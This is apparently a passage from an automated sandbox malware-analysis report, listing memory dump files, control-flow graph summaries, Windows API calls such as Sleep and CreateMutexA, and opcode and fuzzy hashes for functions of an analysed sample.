                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721461282.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721482677.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721510508.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721532631.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721557120.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721577134.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721601398.0000000000E38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721621714.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721641509.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721662290.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721683973.0000000000E4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721702825.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721727208.0000000000E57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721750889.0000000000E5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721775954.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721796913.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721817513.0000000000E6E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721838706.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721872195.0000000000E8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721939800.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721966257.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721986621.0000000000ECA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722010599.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722030765.0000000000ED0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722052434.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722076202.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                                              • Opcode ID: e751f4a3e9d94fb35bd478d37de6296298d73f186acd36a234dfa6c1f2cf0b86
                                                                                                                                                                                                                                                              • Instruction ID: 384c152fef5327cf77358e45480ce0f45a4be6c36f8a8349bd28f36a20f97886
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e751f4a3e9d94fb35bd478d37de6296298d73f186acd36a234dfa6c1f2cf0b86
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14213A71388209DBFB2867689897F7DB3E1DF81308F2448EEE544D62D2CF7A59818593

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 477 bca34f-bca35b 478 bca35d-bca36b 477->478 479 bca371-bca39a call bdd663 477->479 478->479 480 bca93a 478->480 485 bca39c-bca3a8 479->485 486 bca3c8-bca916 call bd80c0 479->486 483 bca953-bca994 Sleep CreateMutexA 480->483 484 bca93a call bf6c6a 480->484 493 bca996-bca998 483->493 494 bca9a7-bca9a8 483->494 484->483 487 bca3be-bca3c5 call bdd663 485->487 488 bca3aa-bca3b8 485->488 487->486 488->480 488->487 493->494 497 bca99a-bca9a5 493->497 497->494
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00BCA963
                                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00C23254), ref: 00BCA981
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1720616098.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720596880.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720616098.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720688459.0000000000C29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720708320.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720728683.0000000000C35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720747541.0000000000C36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720766956.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720894988.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720917073.0000000000D96000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720944333.0000000000DA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720964524.0000000000DAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721021913.0000000000DB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721045219.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721064010.0000000000DBE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721083619.0000000000DC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721103230.0000000000DC9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721122511.0000000000DCB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721142328.0000000000DCC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721165654.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721193761.0000000000DE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721213381.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721236438.0000000000DE6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721256792.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721280507.0000000000DF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721301049.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721329366.0000000000E0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721351970.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721374309.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721398668.0000000000E1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721419247.0000000000E1D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721441285.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721461282.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721482677.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721510508.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721532631.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721557120.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721577134.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721601398.0000000000E38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721621714.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721641509.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721662290.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721683973.0000000000E4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721702825.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721727208.0000000000E57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721750889.0000000000E5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721775954.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721796913.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721817513.0000000000E6E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721838706.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721872195.0000000000E8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721939800.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721966257.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721986621.0000000000ECA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722010599.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722030765.0000000000ED0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722052434.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722076202.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                                              • Opcode ID: 5ee163f67da3315d037495a09a0f1aae27bf9769956f36a8e6e88939cd809a77
                                                                                                                                                                                                                                                              • Instruction ID: 18a20f715c9df9606f018e7aa03a63d6e72bd0cdd5bd86d144dc9357162f2331
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ee163f67da3315d037495a09a0f1aae27bf9769956f36a8e6e88939cd809a77
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19219B31704248DBEB189B68ED86F6CF7B2DBC2318F2042ADE404D77D5CB76A9808752

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 536 4990b7d-4990b82 537 4990bd5-4990c15 536->537 538 4990b84-4990bbb 536->538 547 4990c16-4990c2e 537->547 544 4990bbc 538->544 544->544 549 4990c30-4990cc1 547->549 554 4990cc7-4990d24 549->554 555 4990cc2 call 4990cda 549->555 558 4990d2b-4990d34 554->558 555->554 559 4990d4d-4990d7a call 4990d82 558->559 564 4990d7c-4990d7d 559->564 565 4990d3f-4990d4b 559->565 566 4990d3d-4990d3e 564->566 567 4990d7f-4990d86 564->567 565->559 566->565
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1723680323.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4990000_file.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: +PBd$n[)
                                                                                                                                                                                                                                                              • API String ID: 0-3336804178
                                                                                                                                                                                                                                                              • Opcode ID: 393763a31fc144a42fbdd40c837d3718f28abbeaa40afce696cec9408277075d
                                                                                                                                                                                                                                                              • Instruction ID: 8f9ffec2b0cb9436682aa808dffa9c1fd0c4f9d64402781d3c045615f297c854
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 393763a31fc144a42fbdd40c837d3718f28abbeaa40afce696cec9408277075d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D931E5EB20C210BE7A0195496B51AF777EFE5D27303348C3AF467C6502F2A52D4A6572

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 568 4990c1d-4990c2b 569 4990c2d-4990c2e 568->569 570 4990c30-4990cc1 569->570 571 4990c16-4990c18 569->571 576 4990cc7-4990d24 570->576 577 4990cc2 call 4990cda 570->577 571->569 580 4990d2b-4990d34 576->580 577->576 581 4990d4d-4990d7a call 4990d82 580->581 586 4990d7c-4990d7d 581->586 587 4990d3f-4990d4b 581->587 588 4990d3d-4990d3e 586->588 589 4990d7f-4990d86 586->589 587->581 588->587
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1723680323.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4990000_file.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: +PBd$n[)
                                                                                                                                                                                                                                                              • API String ID: 0-3336804178
                                                                                                                                                                                                                                                              • Opcode ID: 50805195521dfb7ada0a6ec022419bdb61dd4e1d139627ded9446c314cb99418
                                                                                                                                                                                                                                                              • Instruction ID: af144ad5f8445b6f086cc05f8810445e9243b5d3a372e0bc03a89946d564ed44
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 50805195521dfb7ada0a6ec022419bdb61dd4e1d139627ded9446c314cb99418
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 313135EB1083557EBA0255696A50AF76BEED5D2730331CC37F867CA502E2A42C4AA171

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 590 4990be5-4990c15 594 4990c16-4990c2e 590->594 596 4990c30-4990cc1 594->596 601 4990cc7-4990d24 596->601 602 4990cc2 call 4990cda 596->602 605 4990d2b-4990d34 601->605 602->601 606 4990d4d-4990d7a call 4990d82 605->606 611 4990d7c-4990d7d 606->611 612 4990d3f-4990d4b 606->612 613 4990d3d-4990d3e 611->613 614 4990d7f-4990d86 611->614 612->606 613->612
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1723680323.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4990000_file.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: +PBd$n[)
                                                                                                                                                                                                                                                              • API String ID: 0-3336804178
                                                                                                                                                                                                                                                              • Opcode ID: a44d04c19f810efe86103ad209be66c015886f6a4d3fdc1a6b02127318347e21
                                                                                                                                                                                                                                                              • Instruction ID: 11acf658f5eca0fb91e684efa83d93233c24a31c1f79481889f19bf1b770c8a0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a44d04c19f810efe86103ad209be66c015886f6a4d3fdc1a6b02127318347e21
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B2105EB1082107EBA029559AB51AFB77EFD6D1730335CC37F823CA502E2A52D4A6171
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1723680323.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4990000_file.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: +PBd$n[)
                                                                                                                                                                                                                                                              • API String ID: 0-3336804178
                                                                                                                                                                                                                                                              • Opcode ID: c56d1bc68433f94e35805fb7faf58ec54db22c49b1a7811ce9a31ff3c483b91c
                                                                                                                                                                                                                                                              • Instruction ID: bf491cbf58c47af05d306f1ac2db1d2d86f8a31ea93c9dba83ebd5020793ccec
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c56d1bc68433f94e35805fb7faf58ec54db22c49b1a7811ce9a31ff3c483b91c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B121F2EB1082107D79029549AB51AFB7B9FE5D6B30335CC36F827C6502F2A52D8964B1
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BC7ED3
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1720616098.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720596880.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720616098.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720688459.0000000000C29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720708320.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720728683.0000000000C35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720747541.0000000000C36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720766956.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720894988.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720917073.0000000000D96000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720944333.0000000000DA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720964524.0000000000DAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721021913.0000000000DB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721045219.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721064010.0000000000DBE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721083619.0000000000DC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721103230.0000000000DC9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721122511.0000000000DCB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721142328.0000000000DCC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721165654.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721193761.0000000000DE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721213381.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721236438.0000000000DE6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721256792.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721280507.0000000000DF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721301049.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721329366.0000000000E0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721351970.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721374309.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721398668.0000000000E1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721419247.0000000000E1D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721441285.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721461282.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721482677.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721510508.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721532631.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721557120.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721577134.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721601398.0000000000E38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721621714.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721641509.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721662290.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721683973.0000000000E4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721702825.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721727208.0000000000E57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721750889.0000000000E5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721775954.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721796913.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721817513.0000000000E6E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721838706.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721872195.0000000000E8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721939800.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
